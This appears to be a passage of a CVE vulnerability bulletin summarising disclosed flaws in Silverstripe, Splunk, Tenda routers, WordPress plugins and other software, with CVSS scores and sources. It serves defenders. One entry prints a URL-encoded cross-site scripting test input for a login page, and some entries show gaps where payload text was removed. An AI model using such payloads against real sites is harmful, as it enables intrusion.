Silverstripe Admin provides a basic management interface for the Silverstripe Framework. In versions on the 1.x branch prior to 1.13.19 and on the 2.x branch prior to 2.1.8, users who don’t have edit or delete permissions for records exposed in a `ModelAdmin` can still edit or delete records using the CSV import form, provided they have create permissions. The likelihood of a user having create permissions but not having edit or delete permissions is low, but it is possible. Note that this doesn’t affect any `ModelAdmin` which has had the import form disabled via the `showImportForm` public property. Versions 1.13.19 and 2.1.8 contain a patch for the issue. Those who have a custom implementation of `BulkLoader` should update their implementations to respect permissions when the return value of `getCheckPermissions()` is true. Those who use any `BulkLoader` in their own project logic, or maintain a module which uses it, should consider passing `true` to `setCheckPermissions()` if the data is provided by users. 2024-01-23 4.3 CVE-2023-49783
security-advisories@github.com
security-advisories@github.com
silverstripe — silverstripe-framework
 
Silverstripe Framework is the framework that forms the base of the Silverstripe content management system. Prior to versions 4.13.39 and 5.1.11, if a user should not be able to see a record, but that record can be added to a `GridField` using the `GridFieldAddExistingAutocompleter` component, the record’s title can be accessed by that user. Versions 4.13.39 and 5.1.11 contain a fix for this issue. 2024-01-23 4.3 CVE-2023-48714
security-advisories@github.com
security-advisories@github.com
silverstripe — silverstripe-graphql
 
The Silverstripe CMS GraphQL Server serves Silverstripe data as GraphQL representations. In versions 4.0.0 prior to 4.3.7 and 5.0.0 prior to 5.1.3, `canView` permission checks are bypassed for ORM data in paginated GraphQL query results where the total number of records is greater than the number of records per page. Note that this also affects GraphQL queries which have a limit applied, even if the query isn’t paginated per se. This has been fixed in versions 4.3.7 and 5.1.3 by ensuring no new records are pulled in from the database after performing `canView` permission checks for each page of results. This may result in some pages in the query results having less than the maximum number of records per page even when there are more pages of results. This behavior is consistent with how pagination works in other areas of Silverstripe CMS, such as in `GridField`, and is a result of having to perform permission checks in PHP rather than in the database directly. One may disable these permission checks by disabling the `CanViewPermission` plugin. 2024-01-23 5.3 CVE-2023-44401
security-advisories@github.com
security-advisories@github.com
sourcecodester — online_tours_&_travels_management_system
 
A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been declared as critical. This vulnerability affects the function prepare of the file admin/pay.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252034 is the identifier assigned to this vulnerability. 2024-01-25 6.3 CVE-2024-0883
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester — online_tours_&_travels_management_system
 
A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. This issue affects the function exec of the file payment.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252035. 2024-01-25 4.7 CVE-2024-0884
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
spip — spip SPIP before 4.1.14 and 4.2.x before 4.2.8 allows XSS via the name of an uploaded file. This is related to javascript/bigup.js and javascript/bigup.utils.js. 2024-01-19 6.1 CVE-2024-23659
cve@mitre.org
cve@mitre.org
cve@mitre.org
splunk — splunk_enterprise
 
In Splunk Enterprise versions below 9.0.8 and 9.1.3, Splunk app key value store (KV Store) improperly handles permissions for users that use the REST application programming interface (API). This can potentially result in the deletion of KV Store collections. 2024-01-22 6.5 CVE-2024-23675
prodsec@splunk.com
prodsec@splunk.com
splunk — splunk_enterprise
 
In Splunk versions below 9.0.8 and 9.1.3, the “mrollup” SPL command lets a low-privileged user view metrics on an index that they do not have permission to view. This vulnerability requires user interaction from a high-privileged user to exploit. 2024-01-22 4.6 CVE-2024-23676
prodsec@splunk.com
prodsec@splunk.com
splunk — splunk_enterprise
 
In Splunk Enterprise versions below 9.0.8, the Splunk RapidDiag utility discloses server responses from external applications in a log file. 2024-01-22 4.3 CVE-2024-23677
prodsec@splunk.com
squid-cache — squid
 
Squid is a caching proxy for the Web. Due to an expired pointer reference bug, Squid prior to version 6.6 is vulnerable to a Denial of Service attack against Cache Manager error responses. This problem allows a trusted client to perform Denial of Service when generating error pages for Client Manager reports. Squid older than 5.0.5 have not been tested and should be assumed to be vulnerable. All Squid-5.x up to and including 5.9 are vulnerable. All Squid-6.x up to and including 6.5 are vulnerable. This bug is fixed by Squid version 6.6. In addition, patches addressing this problem for the stable releases can be found in Squid’s patch archives. As a workaround, prevent access to Cache Manager using Squid’s main access control: `http_access deny manager`. 2024-01-24 6.5 CVE-2024-23638
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
stanfordvl — gibsonenv
 
A vulnerability was found in StanfordVL GibsonEnv 0.3.1. It has been classified as critical. Affected is the function cloudpickle.load of the file gibsonutilspposgd_fuse.py. The manipulation leads to deserialization. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252204. 2024-01-27 5 CVE-2024-0959
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
strangebee — thehive StrangeBee TheHive 5.1.0 to 5.1.9 and 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case attachment functionality which enables an attacker to upload a malicious HTML file with Javascript code that will be executed in the context of the The Hive application using a specific URL. The vulnerability can be used to coerce a victim account to perform specific actions on the application as helping an analyst becoming administrator. 2024-01-19 5.4 CVE-2024-22876
cve@mitre.org
strangebee — thehive StrangeBee TheHive 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case reporting functionality. This feature allows an attacker to insert malicious JavaScript code inside the template or its variables, that will be executed in the context of the TheHive application when the HTML report is opened. 2024-01-19 5.4 CVE-2024-22877
cve@mitre.org
swftools — swftools A heap-use-after-free was found in SWFTools v0.9.2, in the function input at lex.swf5.c:2620. It allows an attacker to cause denial of service. 2024-01-19 5.5 CVE-2024-22914
cve@mitre.org
swftools — swftools swftools 0.9.2 was discovered to contain an Out-of-bounds Read vulnerability via the function dict_do_lookup in swftools/lib/q.c:1190. 2024-01-19 5.5 CVE-2024-22957
cve@mitre.org
synaptics — synaptics_fingerprint_driver
 
Use of encryption key derived from static information in Synaptics Fingerprint Driver allows an attacker to set up a TLS session with the fingerprint sensor and send restricted commands to the fingerprint sensor. This may allow an attacker, who has physical access to the sensor, to enroll a fingerprint into the template database. 2024-01-27 5.2 CVE-2023-6482
PSIRT@synaptics.com
synology — diskstation_manager_(dsm)
 
URL redirection to untrusted site (‘Open Redirect’) vulnerability in file access component in Synology DiskStation Manager (DSM) before 7.2.1-69057-2 allows remote authenticated users to conduct phishing attacks via unspecified vectors. 2024-01-24 4.1 CVE-2024-0854
security@synology.com
tenda — ac10u
 
A vulnerability classified as critical was found in Tenda AC10U 15.03.06.49_multi_TDE01. Affected by this vulnerability is the function formQuickIndex. The manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252127. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 4.7 CVE-2024-0922
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda — ac10u
 
A vulnerability, which was classified as critical, has been found in Tenda AC10U 15.03.06.49_multi_TDE01. Affected by this issue is the function formSetDeviceName. The manipulation of the argument devName leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252128. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 4.7 CVE-2024-0923
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda — ac10u
 
A vulnerability, which was classified as critical, was found in Tenda AC10U 15.03.06.49_multi_TDE01. This affects the function formSetPPTPServer. The manipulation of the argument startIp leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252129 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 4.7 CVE-2024-0924
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda — ac10u
 
A vulnerability has been found in Tenda AC10U 15.03.06.49_multi_TDE01 and classified as critical. This vulnerability affects the function formSetVirtualSer. The manipulation of the argument list leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252130 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 4.7 CVE-2024-0925
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda — ac10u
 
A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01 and classified as critical. This issue affects the function formWifiWpsOOB. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252131. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 4.7 CVE-2024-0926
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda — ac10u
 
A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been classified as critical. Affected is the function fromAddressNat. The manipulation of the argument entrys/mitInterface/page leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252132. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 4.7 CVE-2024-0927
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda — ac10u
 
A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been declared as critical. Affected by this vulnerability is the function fromDhcpListClient. The manipulation of the argument page/listN leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252133 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 4.7 CVE-2024-0928
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda — ac10u
 
A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been rated as critical. Affected by this issue is the function fromNatStaticSetting. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252134 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 4.7 CVE-2024-0929
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda — ac10u
 
A vulnerability classified as critical has been found in Tenda AC10U 15.03.06.49_multi_TDE01. This affects the function fromSetWirelessRepeat. The manipulation of the argument wpapsk_crypto leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252135. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 4.7 CVE-2024-0930
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda — ac10u
 
A vulnerability classified as critical was found in Tenda AC10U 15.03.06.49_multi_TDE01. This vulnerability affects the function saveParentControlInfo. The manipulation of the argument deviceId/time/urls leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252136. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 4.7 CVE-2024-0931
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda — ac10u
 
A vulnerability, which was classified as critical, has been found in Tenda AC10U 15.03.06.49_multi_TDE01. This issue affects the function setSmartPowerManagement. The manipulation of the argument time leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252137 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 4.7 CVE-2024-0932
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
the_notary_project — the_notary_project
 
The Notary Project is a set of specifications and tools intended to provide a cross-industry standard for securing software supply chains by using authentic container images and other OCI artifacts. An external actor with control of a compromised container registry can provide outdated versions of OCI artifacts, such as Images. This could lead artifact consumers with relaxed trust policies (such as `permissive` instead of `strict`) to potentially use artifacts with signatures that are no longer valid, making them susceptible to any exploits those artifacts may contain. In Notary Project, an artifact publisher can control the validity period of artifact by specifying signature expiry during the signing process. Using shorter signature validity periods along with processes to periodically resign artifacts, allows artifact producers to ensure that their consumers will only receive up-to-date artifacts. Artifact consumers should correspondingly use a `strict` or equivalent trust policy that enforces signature expiry. Together these steps enable use of up-to-date artifacts and safeguard against rollback attack in the event of registry compromise. The Notary Project offers various signature validation options such as `permissive`, `audit` and `skip` to support various scenarios. These scenarios includes 1) situations demanding urgent workload deployment, necessitating the bypassing of expired or revoked signatures; 2) auditing of artifacts lacking signatures without interrupting workload; and 3) skipping of verification for specific images that might have undergone validation through alternative mechanisms. Additionally, the Notary Project supports revocation to ensure the signature freshness. Artifact publishers can sign with short-lived certificates and revoke older certificates when necessary. This revocation serves as a signal to inform artifact consumers that the corresponding unexpired artifact is no longer approved by the publisher. This enables the artifact publisher to control the validity of the signature independently of their ability to manage artifacts in a compromised registry. 2024-01-19 4 CVE-2024-23332
security-advisories@github.com
security-advisories@github.com
themegrill — colormag The ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins. 2024-01-20 6.5 CVE-2024-0679
security@wordfence.com
security@wordfence.com
security@wordfence.com
thomas_maier — image_source_control_lite-show_image_credits_and_captions
 
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Thomas Maier Image Source Control Lite – Show Image Credits and Captions. This issue affects Image Source Control Lite – Show Image Credits and Captions: from n/a through 2.17.0. 2024-01-27 5.3 CVE-2023-52187
audit@patchstack.com
tongda — oa_2017
 
A vulnerability, which was classified as critical, was found in Tongda OA 2017 up to 11.9. This affects an unknown part of the file /general/email/inbox/delete_webmail.php. The manipulation of the argument WEBBODY_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252183. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 5.5 CVE-2024-0938
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
trillium-rs — trillium
 
Trillium is a composable toolkit for building internet applications with async rust. In `trillium-http` prior to 0.3.12 and `trillium-client` prior to 0.5.4, insufficient validation of outbound header values may lead to request splitting or response splitting attacks in scenarios where attackers have sufficient control over headers. This only affects use cases where attackers have control of request headers, and can insert “rn” sequences. Specifically, if untrusted and unvalidated input is inserted into header names or values. Outbound `trillium_http::HeaderValue` and `trillium_http::HeaderName` can be constructed infallibly and were not checked for illegal bytes when sending requests from the client or responses from the server. Thus, if an attacker has sufficient control over header values (or names) in a request or response that they could inject `rn` sequences, they could get the client and server out of sync, and then pivot to gain control over other parts of requests or responses. (i.e. exfiltrating data from other requests, SSRF, etc.) In `trillium-http` versions 0.3.12 and later, if a header name is invalid in server response headers, the specific header and any associated values are omitted from network transmission. Additionally, if a header value is invalid in server response headers, the individual header value is omitted from network transmission. Other headers values with the same header name will still be sent. In `trillium-client` versions 0.5.4 and later, if any header name or header value is invalid in the client request headers, awaiting the client Conn returns an `Error::MalformedHeader` prior to any network access. As a workaround, Trillium services and client applications should sanitize or validate untrusted input that is included in header values and header names. Carriage return, newline, and null characters are not allowed. 2024-01-24 6.8 CVE-2024-23644
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
tutao — tutanota
 
Tuta is an encrypted email service. In versions prior to 119.10, an attacker can attach an image in a html mail which is loaded from external resource in the default setting, which should prevent loading of external resources. When displaying emails containing external content, they should be loaded by default only after confirmation by the user. However, it could be recognized that certain embedded images (see PoC) are loaded, even though the “Automatic Reloading of Images” function is disabled by default. The reloading is also done unencrypted via HTTP and redirections are followed. This behavior is unexpected for the user, since the user assumes that external content will only be loaded after explicit manual confirmation. The loading of external content in e-mails represents a risk, because this makes the sender aware that the e-mail address is used, when the e-mail was read, which device is used and expose the user’s IP address. Version 119.10 contains a patch for this issue. 2024-01-23 5.3 CVE-2024-23330
security-advisories@github.com
unix4lyfe — darkhttpd darkhttpd through 1.15 allows local users to discover credentials (for –auth) by listing processes and their arguments. 2024-01-22 5.5 CVE-2024-23770
cve@mitre.org
cve@mitre.org
cve@mitre.org
van_der_schaar_lab — synthcity
 
A vulnerability, which was classified as critical, has been found in van_der_Schaar LAB synthcity 0.2.9. Affected by this issue is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252182 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024. 2024-01-26 6.3 CVE-2024-0937
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
van_der_schaar_lab — temporai
 
A vulnerability classified as critical was found in van_der_Schaar LAB TemporAI 0.0.3. Affected by this vulnerability is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252181 was assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024. 2024-01-26 6.3 CVE-2024-0936
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
vektor-inc — vk_block_patterns The VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2024-01-20 4.3 CVE-2024-0623
security@wordfence.com
security@wordfence.com
wordpress — wordpress The SEOPress WordPress plugin before 7.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed 2024-01-22 4.8 CVE-2023-6290
contact@wpscan.com
wordpress — wordpress
 
The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the map id parameter in all versions up to, and including, 9.0.28 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. 2024-01-24 6.1 CVE-2023-6697
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 
The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘disqus_name’ parameter in all versions up to, and including, 1.0.92.1 due to insufficient input sanitization and output escaping on the executed JS file. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. 2024-01-23 6.1 CVE-2024-0587
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 
The WP Customer Area plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘tab’ parameter in all versions up to, and including, 8.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. 2024-01-24 6.1 CVE-2024-0665
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 
The Backuply – Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.2.3 via the node_id parameter in the backuply_get_jstree function. This makes it possible for attackers with administrator privileges or higher to read the contents of arbitrary files on the server, which can contain sensitive information. 2024-01-27 6.5 CVE-2024-0697
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 
The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Link Anything functionality in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-01-27 6.4 CVE-2024-0824
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 
The Category Discount Woocommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpcd_save_discount() function in all versions up to, and including, 4.12. This makes it possible for unauthenticated attackers to modify product category discounts that could lead to loss of revenue. 2024-01-25 5.3 CVE-2024-0617
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 
The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.7. This is due to missing or incorrect nonce validation on the pmpro_update_level_order() function. This makes it possible for unauthenticated attackers to update the order of levels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2024-01-25 5.3 CVE-2024-0624
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 
The Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.15.21. This is due to missing or incorrect nonce validation on the ‘execute’ function. This makes it possible for unauthenticated attackers to execute arbitrary methods in the ‘BoosterController’ class via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2024-01-27 5.4 CVE-2024-0667
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 
The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the automatic redirect URL setting in all versions up to and including 4.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. 2024-01-27 4.4 CVE-2023-6497
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 
The Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via imported form titles in all versions up to, and including, 5.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. 2024-01-27 4.4 CVE-2024-0618
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 
The WPFront Notification Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘wpfront-notification-bar-options[custom_class]’ parameter in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. 2024-01-25 4.4 CVE-2024-0625
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 
The Meks Smart Social Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Meks Smart Social Widget in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. 2024-01-27 4.4 CVE-2024-0664
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 
The “WebSub (FKA. PubSubHubbub)” plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 3.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-01-25 4.4 CVE-2024-0688
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 
The Sticky Buttons – floating buttons builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via sticky URLs in all versions up to, and including, 3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. 2024-01-23 4.4 CVE-2024-0703
security@wordfence.com
security@wordfence.com
wp-eventmanager — user_profile_avatar The WP User Profile Avatar WordPress plugin before 1.0.1 does not properly check for authorisation, allowing authors to delete and update arbitrary avatar 2024-01-22 4.3 CVE-2023-6384
contact@wpscan.com
wpmet — wp_social_login_and_register_social_counter Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wpmet Wp Social Login and Register Social Counter.This issue affects Wp Social Login and Register Social Counter: from n/a through 1.9.0. 2024-01-19 6.5 CVE-2022-47160
audit@patchstack.com
yugeshverma — student_project_allocation_system A vulnerability was found in Project Worlds Student Project Allocation System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin_login.php of the component Admin Login Module. The manipulation of the argument msg with the input test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251549 was assigned to this vulnerability. 2024-01-19 6.1 CVE-2024-0726
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
zulip — zulip
 
Zulip is an open-source team collaboration tool. A vulnerability in version 8.0 is similar to CVE-2023-32677, but applies to multi-use invitations, not single-use invitation links as in the prior CVE. Specifically, it applies when the installation has configured non-admins to be able to invite users and create multi-use invitations, and has also configured only admins to be able to invite users to streams. As in CVE-2023-32677, this does not let users invite new users to arbitrary streams, only to streams that the inviter can already see. Version 8.1 fixes this issue. As a workaround, administrators can limit sending of invitations down to users who also have the permission to add users to streams. 2024-01-25 4.3 CVE-2024-21630
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
changedetection — changedetection changedetection.io is an open source tool designed to monitor websites for content changes. In affected versions the API endpoint `/api/v1/watch//history` can be accessed by any unauthorized user. As a result, any unauthorized user can check one’s watch history. However, because unauthorized party first needs to know a watch UUID, and the watch history endpoint itself returns only paths to the snapshot on the server, an impact on users’ data privacy is minimal. This issue has been addressed in version 0.45.13. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2024-01-19 3.7 CVE-2024-23329
security-advisories@github.com
security-advisories@github.com
codeastro — internet_banking_system
 
A vulnerability, which was classified as problematic, was found in CodeAstro Internet Banking System 1.0. This affects an unknown part of the file pages_client_signup.php. The manipulation of the argument Client Full Name with the input leads to open redirect. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251697 was assigned to this vulnerability. 2024-01-22 3.5 CVE-2024-0781
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
codeastro — online_railway_reservation_system
 
A vulnerability has been found in CodeAstro Online Railway Reservation System 1.0 and classified as problematic. This vulnerability affects unknown code of the file pass-profile.php. The manipulation of the argument First Name/Last Name/User Name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251698 is the identifier assigned to this vulnerability. 2024-01-22 3.5 CVE-2024-0782
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
codeastro — stock_management_system
 
A vulnerability was found in CodeAstro Stock Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /index.php of the component Add Category Handler. The manipulation of the argument Category Name/Category Description leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252203. 2024-01-27 3.5 CVE-2024-0958
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
dell — unity
 
Dell Unity, versions prior to 5.4, contain a vulnerability whereby log messages can be spoofed by an authenticated attacker. An attacker could exploit this vulnerability to forge log entries, create false alarms, and inject malicious content into logs that compromise logs integrity. A malicious attacker could also prevent the product from logging information while malicious actions are performed or implicate an arbitrary user for malicious activities. 2024-01-24 3.1 CVE-2024-22229
security_alert@emc.com
hongmaple — octopus
 
A vulnerability was found in hongmaple octopus 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument description with the input leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-252043. 2024-01-25 3.5 CVE-2024-0891
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
lenovo — tab_m8_hd_tb8505f_firmware An information disclosure vulnerability was reported in the Lenovo Tab M8 HD that could allow a local application to gather a non-resettable device identifier. 2024-01-19 3.3 CVE-2023-5081
psirt@lenovo.com
linzhaoguan — pb-cms
 
A vulnerability, which was classified as problematic, has been found in LinZhaoguan pb-cms 2.0. Affected by this issue is some unknown functionality of the component Comment Handler. The manipulation with the input

leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251678 is the identifier assigned to this vulnerability.
2024-01-22 3.5 CVE-2024-0776
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
microsoft — microsoft_edge_(chromium-based)
 
Microsoft Edge (Chromium-based) Spoofing Vulnerability 2024-01-26 3.3 CVE-2024-21383
secure@microsoft.com
microsoft — microsoft_edge_(chromium-based)
 
Microsoft Edge (Chromium-based) Spoofing Vulnerability 2024-01-26 2.5 CVE-2024-21336
secure@microsoft.com
netbox — netbox
 
A vulnerability, which was classified as problematic, has been found in NetBox up to 3.7.0. This issue affects some unknown processing of the file /core/config-revisions of the component Home Page Configuration. The manipulation with the input <

>test

leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252191. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

2024-01-26 2.4 CVE-2024-0948
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
poikosoft — ez_cd_audio_converter
 
A vulnerability classified as problematic was found in Poikosoft EZ CD Audio Converter 8.0.7. Affected by this vulnerability is an unknown functionality of the component Activation Handler. The manipulation of the argument Key leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-252037 was assigned to this vulnerability. 2024-01-25 3.3 CVE-2024-0886
cna@vuldb.com
